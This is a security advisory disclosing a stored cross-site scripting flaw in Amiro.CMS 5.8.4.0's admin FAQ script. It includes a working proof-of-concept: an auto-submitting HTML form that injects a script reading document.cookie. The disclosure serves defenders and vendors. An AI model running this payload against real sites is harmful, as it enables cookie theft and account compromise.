Vulnerability ID: HTB22590 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_amiro_cms_1.html Product: Amiro.CMS Vendor: Amiro ( http://www.amiro.ru/ ) Vulnerable Version: 5.8.4.0 and Probably Prior Versions Vendor Notification: 18 August 2010 Vulnerability Type: Stored XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "_admin/faq.php" script to properly sanitize user-supplied input in "html_description" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/_admin/faq.php"; method="post" name="main" > <input type="hidden" name="id" value="3" /> <input type="hidden" name="action" value="apply" /> <input type="hidden" name="action_original" value="apply" /> <input type="hidden" name="_form_data" value="1" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="cols" value="" /> <input type="hidden" name="datefrom" value="31.12.1979" /> <input type="hidden" name="enc_datefrom" value="31.12.1979" /> <input type="hidden" name="dateto" value="31.12.2034" /> <input type="hidden" name="enc_dateto" value="31.12.2034" /> <input type="hidden" name="sort" value="answered" /> <input type="hidden" name="enc_sort" value="answered" /> <input type="hidden" name="sdim" value="asc" /> <input type="hidden" name="enc_sdim" value="asc" /> <input type="hidden" name="offset" value="0" /> <input type="hidden" name="enc_offset" value="0" /> <input type="hidden" name="limit" value="10" /> <input type="hidden" name="enc_limit" value="10" /> <input type="hidden" name="_grp_ids" value="" /> <input type="hidden" name="enc__grp_ids" value="" /> <input type="hidden" name="flt_subject_id" value="0" /> <input type="hidden" name="enc_flt_subject_id" value="0" /> <input type="hidden" name="flt_question" value="" /> <input type="hidden" name="enc_flt_question" value="" /> <input type="hidden" name="flt_urgent" value="0" /> <input type="hidden" name="enc_flt_urgent" value="0" /> <input type="hidden" name="public" value="checked" /> <input type="hidden" name="publish" value="" /> <input type="hidden" name="public" value="1" /> <input type="hidden" name="date" value="11.08.2009" /> <input type="hidden" name="cat_id" value="8" /> <input type="hidden" name="catname" value="" /> <input type="hidden" name="author" value="author name" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="send" value="1" /> <input type="hidden" name="sublink" value="faq-page-link" /> <input type="hidden" name="original_sublink" value="faq-page-link" /> <input type="hidden" name="html_title" value="html title" /> <input type="hidden" name="original_html_title" value="html title" /> <input type="hidden" name="html_keywords" value="key1" /> <input type="hidden" name="original_html_keywords" value="key1" /> <input type="hidden" name="is_keywords_manual" value="0" /> <input type="hidden" name="html_description" value='descr"><script>alert(document.cookie)</script>' /> <input type="hidden" name="original_html_description" value="descr" /> <input type="hidden" name="answer" value="answer text" /> <input type="hidden" name="question" value="question text" /> <input type="hidden" name="apply" value="OK" /> </form> <script> document.main.submit(); </script>
